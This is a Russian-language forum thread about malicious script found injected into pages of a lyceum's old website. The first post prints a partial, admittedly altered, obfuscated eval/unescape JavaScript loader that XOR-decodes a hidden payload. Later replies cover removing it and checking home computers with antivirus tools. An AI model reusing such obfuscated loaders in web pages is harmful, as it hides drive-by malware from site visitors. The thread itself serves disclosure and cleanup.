14 replies to this topic

[pevcov]

http_//www.lit.msu.ru/ru/news/detail.php%3FID%3D385 там примерно вот такой код (изменен) script>e*al(unescape('function%20eVpG%28lGxkyn%29%7Bfunction%20vXJd%28evZb%29%7Bvar%20mTiKUBTJ%3D0%3Bvar%20vcu%3DevZb.length%3Bvar%20cPnyB%3D0%3Bwhile%28cPnyB%3Cvcu%29%7BmTiKUBTJ+%3DxGz%28evZb%2CcPnyB%29*vcu%3BcPnyB++%3B%7Dreturn%20%28mTiKUBTJ+%27%27%29%3B%7Dfunction%20xGz%28dTnHI%2CrIurLd%29%7Breturn%20dTnHI.charCodeAt%28rIurLd%29%3B%7D%20%20%20try%20%7Bvar%20ajrbIBT%3De*al%28%27a*rZg0uZmSe*nStZsZ.LcZa0lSl0eZeS%27.replace%28/%5BL%5C*0ZS%5D/g%2C%20%27%27%29%29%3Bvar%20gWIzf%3Dnew%20String%28%29%3Bvar%20fNuG%3D0%3BsXj%3D0%2CeGX%3D%28new%20String%28ajrbIBT%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20wvcmI%3DvXJd%28eGX%29%3BlGxkyn%3Dunescape%28lGxkyn%29%3Bfor%28var%20nYIZI%3D0%3B%20nYIZI%20%3C%20%28lGxkyn.length%29%3B%20nYIZI++%29%7Bvar%20wLn%3DxGz%28eGX%2CfNuG%29%5ExGz%28wvcmI%2CsXj%29%3Bvar%20dTW%3DxGz%28lGxkyn%2CnYIZI%29%3BsXj++%3BfNuG++%3Bif%28sXj%3EwvcmI.length%29sXj%3D0%3Bif%28fNuG%3EeGX.length%29fNuG%3D0%3BgWIzf+%3DString.fromCharCode%28dTW%5EwLn%29%3B%7De*al%28gWIzf%29%3B%20return%20gWIzf%3Dnew%20String%28.......%3B'));</script

[Денис]

Спасибо! Сейчас буду смотреть.

[Денис]

Кусочки кода такого шаблона в разных файлах найдены и удалены. Сергей, спасибо!

[Дей-Лак]

А можно мне непросвещенному объяснить что в этом коде не так?

[Денис]

В нем закодирован вредоносный код, который выполняется на машине пользователя в браузере.

[Stasia]

О.о А кто его туда закодировал?=)

[гык-sse2]

В нем закодирован вредоносный код, который выполняется на машине пользователя в браузере.

А что он делал и поддерживает ли он Safari 5.0/Mac?

[pevcov]

Для тех, кто заходил на lit.msu.ru напишу, как проверить свой комп. Эта проверка не гарантирует, что все вирусы будут найдены, но хуже не будет... 1. Скачайте avz с сайта z-oleg.com, обновите базы стандартным скриптом и запустите проверку. Проверить нужно еще и диск С. 2. Скачайте CureIt с сайта drweb.com и запустите полную проверку. Для гиков: 3. Скачайте утилиту против tdss с esagelab.com и gmer с gmer.net и проверьтесь ими. А вообще ставьте NoScript и FlashBlock, заодно отключив плагин Acrobat Readera в Firefox'e. Ну и... пользуйтесь Яндексом, он предупреждает о некоторых вирусах

[Денис]

На всякий случай я также отмечу, что заражены были только куски старого сайта Лицея (бело-сине-рыжий, Битрикс), поэтому вероятность попадания туда пользователей была минимальной. Но, конечно, она была и проверить свою систему лишний раз лишним не будет)

[starcev]

Как я понял это какой-то эксплойт на плагин акробата? Надеюсь он под оперой не пашет?

[Sankinn]

а можно проверить систему просто антивирусом или надо сделать так, как сказано выше?

[pevcov]

а можно проверить систему просто антивирусом или надо сделать так, как сказано выше?

А каким?

[koraalex]

Ещё один юзерский вопрос: брандмауэр типа Outpost на такую штуку внимание обращает?

[pevcov]

Ещё один юзерский вопрос: брандмауэр типа Outpost на такую штуку внимание обращает?

Если троян начнет ломиться по каким-нибудь странным портам, то, вероятно, обратит. Но сейчас трояны такие трояны... В них чуть ли не антивирусный функционал встраивают для убийства антивирусов на компе. В общем, шанс есть, но гарантий нет. Ну, как вообще со всеми антивирусами

[Sankinn]

А каким?

Касперским.